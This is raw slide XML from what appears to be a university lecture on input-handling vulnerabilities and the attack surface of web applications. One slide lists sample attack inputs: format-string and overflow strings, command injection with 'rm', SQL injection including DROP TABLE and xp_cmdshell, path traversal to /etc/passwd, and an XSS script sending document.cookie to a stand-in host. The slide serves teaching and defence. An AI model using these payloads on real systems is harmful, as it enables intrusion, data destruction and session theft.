                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C220865D-DD7D-BC16-DE6E-F18E0F7C4E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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25AFFFE7-D458-2BED-B93F-9C067DA9ABEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C0747E-1840-4E48-D7B9-110F1FA6B0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2924931" y="1967312"/>
            <a:ext cx="1369656" cy="106881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rgbClr val="339933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B7C51785-C8DE-7905-44CD-36904004B182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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Many 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overlaps,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5411578F-37DA-AF50-5203-D34F0C5806C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF998C92-53A6-6BB8-5867-B6565D0E1430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11C0833-F4F9-037B-EDFE-0F06CC46A9A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A97797-12AF-66A7-7EE9-B70C57296AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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B5971B-AE51-4D1D-31C6-AF99DD2F6E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="871222" y="1441645"/>
            <a:ext cx="5742899" cy="2278257"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="339933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ACCESS CONTROL problems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500EE5A-E5AE-675E-ABE5-6699D7F161AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="893717" y="3801242"/>
            <a:ext cx="5742899" cy="2369703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DE62F2-C849-87F6-078E-D0885A565008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="773317" y="3663719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        buggy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ieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>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4B9157-0C25-6050-0BD9-9187B52FED55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3751322" y="3640335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unintended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ieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>    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3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7200" baseline="-25000" dirty="0"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C0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/>
              <a:t>problems</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="4000" dirty="0"/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49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2120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9812-645D-024D-A0CA-BBBE5DB1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A6143-2BB3-D188-AC96-EEC0A3D9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226"/>
            <a:ext cx="7761288" cy="496886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Fun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" baseline="-25000" dirty="0">
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> to try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355FB-CB39-C20C-4BAC-29FF51E8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0" y="795373"/>
            <a:ext cx="7761288" cy="51041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Ridiculously long inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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</a:rPr>
              <a:t>or with  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x%x%x%x%x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to trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> format string attacks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OS command injection     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>erik@ru.nl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; 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rm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–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/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SQL injection                      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erik@ru.nl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’; DROP TABLE Customers;--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erik@ru.nl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’; exec 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master.dbo.xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Path traversal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lang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etc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passwd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lang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../../../../dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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urandom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IDOR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Forced Browsing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uid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s000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>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   , 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s001</a:t>
            </a:r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r>
              <a:rPr lang="en-GB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                       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HTML injection &amp; XSS   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via HTML input in the text field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          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&lt;html&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a: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=”http://a.com/a.jpg”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width =”999999999” height=”999999999”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&gt;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 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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                    &lt;html&gt; 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&lt;script&gt; …;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img.src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 =”http://mafia.com/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1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document.cookie</a:t>
            </a:r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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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</a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or via URL parameter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http://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=s456&amp;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&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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CSRF </a:t>
            </a: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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, LDAP, XML, SSI, XXE, OGNL,  … injection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735C14-9471-6A6D-518B-433450896B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007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observations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Most (all?) attacks involve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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US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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>which ends up in a place where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> it causes software to ‘go off the rails’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Input may be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forwarded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> between systems to reach place where it does damage  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are there structural approach to combat these 100s of variants of input handling problems?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicParenR"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18824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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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A31D9F-E20A-03D4-CE57-7ED8DC2FEAF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115616" y="1439464"/>
            <a:ext cx="6723983" cy="3416176"/>
            <a:chOff x="1277335" y="1653956"/>
            <a:chExt cx="6723983" cy="3416176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5069124" y="1793478"/>
              <a:ext cx="1301697" cy="1051578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Web</a:t>
              </a:r>
            </a:p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server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6699622" y="1653956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6900253" y="2331937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6699621" y="2843418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5079203" y="2438538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9707" name="Vrije vorm 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="21378049">
              <a:off x="2507579" y="2517854"/>
              <a:ext cx="2915620" cy="2462905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5057078" y="411816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5152849" y="3393120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5059738" y="372877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4909357" y="4483303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166314" y="1999702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6760661" y="2883243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6943912" y="2386834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6740941" y="1877460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41" y="1884438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xplosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B49AB2F-D689-56A6-A2A2-1FAA4EE4973D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6670540" y="1793400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0245B2BA-2FDB-F68B-6970-547804D9A877}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6862235" y="2326869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4DD17A6F-991D-D5BA-090E-77536D734564}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6654231" y="2768584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6" name="Rechte verbindingslijn met pijl 2"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6225308" y="2766728"/>
              <a:ext cx="573147" cy="21571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6240968" y="2478059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77FCD6-7623-8979-B817-77745D55B0DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="5317139"/>
            <a:ext cx="736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Big attack surface in application, the underlying protocol stack,  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and external services.</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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329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Attack surface for  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="44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problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="24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9701" name="Tijdelijke aanduiding voor dianummer 3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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-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8133CD-CA8D-6507-C23F-5605251457BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1259632" y="1358826"/>
            <a:ext cx="6163581" cy="4024658"/>
            <a:chOff x="510309" y="1045474"/>
            <a:chExt cx="6163581" cy="4024658"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rechthoek 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1287414" y="4337249"/>
              <a:ext cx="1699022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Wifi</a:t>
              </a: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/ 4G  </a:t>
              </a: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1287414" y="3955689"/>
              <a:ext cx="1699022" cy="336925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7ADB3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7" name="Rechthoek 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1277335" y="3230005"/>
              <a:ext cx="1699022" cy="319646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="8DE04E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  <a:endParaRPr lang="en-GB" sz="1633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77335" y="3600046"/>
              <a:ext cx="1699022" cy="306688"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="73D927"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx2"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1814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4974869" y="4337249"/>
              <a:ext cx="1699021" cy="326846"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="64BD2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Ethernet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4974869" y="3955689"/>
              <a:ext cx="1699021" cy="336925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="70D5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TCP/IP</a:t>
              </a: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4964789" y="3230005"/>
              <a:ext cx="1699021" cy="319646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="8DE04E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633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HTTP</a:t>
              </a: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4964789" y="3600046"/>
              <a:ext cx="1699021" cy="306688"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6FD125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TLS</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2177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Pijl-links en -rechts 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1568185" y="4770644"/>
              <a:ext cx="4951640" cy="299488"/>
            </a:xfrm>
            <a:prstGeom prst="leftRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 81058"/>
                <a:gd name="adj2" fmla="val 34472"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3A6F1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endParaRPr lang="en-GB" sz="2177">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="64" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Explosie 2 59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1499274" y="4146841"/>
              <a:ext cx="508229" cy="23266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2" name="Explosie 2 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1510572" y="3402429"/>
              <a:ext cx="453841" cy="225392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61" name="Explosie 2 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1482627" y="3798731"/>
              <a:ext cx="509730" cy="229509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9" name="Explosie 2 58"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1831728" y="4551381"/>
              <a:ext cx="486983" cy="225427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1372844" y="1766701"/>
              <a:ext cx="1301697" cy="993434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App or  browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Stroomdiagram: Magnetische schijf 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3003342" y="1569035"/>
              <a:ext cx="1122153" cy="555782"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk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database</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="254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Afgeronde rechthoek 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3203973" y="2247016"/>
              <a:ext cx="823842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     OS  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8" name="Afgeronde rechthoek 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3003341" y="2758497"/>
              <a:ext cx="1301697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file system</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Explosie 2 65"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1507724" y="2404501"/>
              <a:ext cx="551798" cy="297598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1" name="Afgeronde rechthoek 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{465EED6F-4678-B2B1-A174-C2AD4BBF4C33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2192246" y="1045474"/>
              <a:ext cx="1724754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HTML renderer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12" name="Rechte verbindingslijn met pijl 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4341A659-7A7E-2DEB-F2F6-5EEB42B27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42042" y="1359102"/>
              <a:ext cx="66812" cy="43853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fgeronde rechthoek 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8A1073A-D2AC-32EE-E328-48F5682ABC78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="510309" y="1128338"/>
              <a:ext cx="1293023" cy="370041"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AAE97B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  <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-GB" sz="145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PDF viewer</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="145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Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E260BCA-8174-D202-E555-6BD3C0181FA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="949019" y="1359103"/>
              <a:ext cx="573060" cy="240455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10" name="Rechte verbindingslijn met pijl 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{670F8074-92B7-7849-5C7F-CEF78B4470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15278" y="1426081"/>
              <a:ext cx="315130" cy="47780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CCDE82-233F-B123-C6EE-012ACDC0A07B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipV="1">
              <a:off x="3064381" y="2798322"/>
              <a:ext cx="210528" cy="269277"/>
              <a:chOff x="8622963" y="2505809"/>
              <a:chExt cx="232092" cy="305321"/>
            </a:xfrm>
          </p:grpSpPr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AE2F833C-61F7-E287-BD30-1F77FF0D8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0" name="Picture 29" descr="Icon&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77EE723B-6FCA-C497-93B6-3B5FD3836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EFACA0-6C4B-4F54-9023-21C5A7E1AA5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipV="1">
              <a:off x="3247632" y="2301913"/>
              <a:ext cx="210528" cy="269277"/>
              <a:chOff x="8622963" y="2505809"/>
              <a:chExt cx="232092" cy="305321"/>
            </a:xfrm>
          </p:grpSpPr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E25A5D69-7144-92E4-8665-9D553037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071EB4B8-697F-7C82-494A-40240ECB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66431BA-31B1-7C69-DF36-08340F35ADE2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipV="1">
              <a:off x="3044661" y="1792539"/>
              <a:ext cx="210528" cy="269277"/>
              <a:chOff x="8622963" y="2505809"/>
              <a:chExt cx="232092" cy="305321"/>
            </a:xfrm>
          </p:grpSpPr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F5202FEC-E5F6-21FB-51F9-CE176589E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6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804CAD85-95D4-570B-D183-973B03FC6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7C5F6F3-09FB-E618-E8ED-8DA122593D39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipV="1">
              <a:off x="2275448" y="1080291"/>
              <a:ext cx="210528" cy="269277"/>
              <a:chOff x="8622963" y="2505809"/>
              <a:chExt cx="232092" cy="305321"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="42" name="Picture 41" descr="Icon&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A80BE1-736C-9D7D-FF18-1490EC3F6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240000">
                <a:off x="8622963" y="2505809"/>
                <a:ext cx="165351" cy="180203"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="43" name="Picture 42" descr="Icon&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66647954-61E3-7E98-68F0-41FBD0BC4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0000">
                <a:off x="8710940" y="2654070"/>
                <a:ext cx="144115" cy="157060"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="Picture 2" descr="C:\Users\erikpoll\Desktop\.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FE3C894-B2F1-7A12-BD2A-EEC544693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131" y="1753121"/>
              <a:ext cx="774968" cy="74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Vrije vorm 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="223311" flipH="1">
              <a:off x="1735241" y="2420184"/>
              <a:ext cx="3735742" cy="2557326"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 4827062"/>
                <a:gd name="T1" fmla="*/ 0 h 1064609"/>
                <a:gd name="T2" fmla="*/ 525 w 4827062"/>
                <a:gd name="T3" fmla="*/ 46580341 h 1064609"/>
                <a:gd name="T4" fmla="*/ 4238 w 4827062"/>
                <a:gd name="T5" fmla="*/ 65988846 h 1064609"/>
                <a:gd name="T6" fmla="*/ 21152 w 4827062"/>
                <a:gd name="T7" fmla="*/ 82291790 h 1064609"/>
                <a:gd name="T8" fmla="*/ 59522 w 4827062"/>
                <a:gd name="T9" fmla="*/ 86949822 h 1064609"/>
                <a:gd name="T10" fmla="*/ 108205 w 4827062"/>
                <a:gd name="T11" fmla="*/ 88502607 h 1064609"/>
                <a:gd name="T12" fmla="*/ 161426 w 4827062"/>
                <a:gd name="T13" fmla="*/ 88502607 h 1064609"/>
                <a:gd name="T14" fmla="*/ 200207 w 4827062"/>
                <a:gd name="T15" fmla="*/ 76081215 h 1064609"/>
                <a:gd name="T16" fmla="*/ 213408 w 4827062"/>
                <a:gd name="T17" fmla="*/ 50461985 h 1064609"/>
                <a:gd name="T18" fmla="*/ 215471 w 4827062"/>
                <a:gd name="T19" fmla="*/ 6986969 h 10646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27062" h="1064609">
                  <a:moveTo>
                    <a:pt x="2513" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-566" y="211667"/>
                    <a:pt x="-3644" y="423334"/>
                    <a:pt x="11750" y="554182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27144" y="685031"/>
                    <a:pt x="17907" y="714279"/>
                    <a:pt x="94877" y="785091"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171847" y="855903"/>
                    <a:pt x="267289" y="937491"/>
                    <a:pt x="473568" y="979055"/>
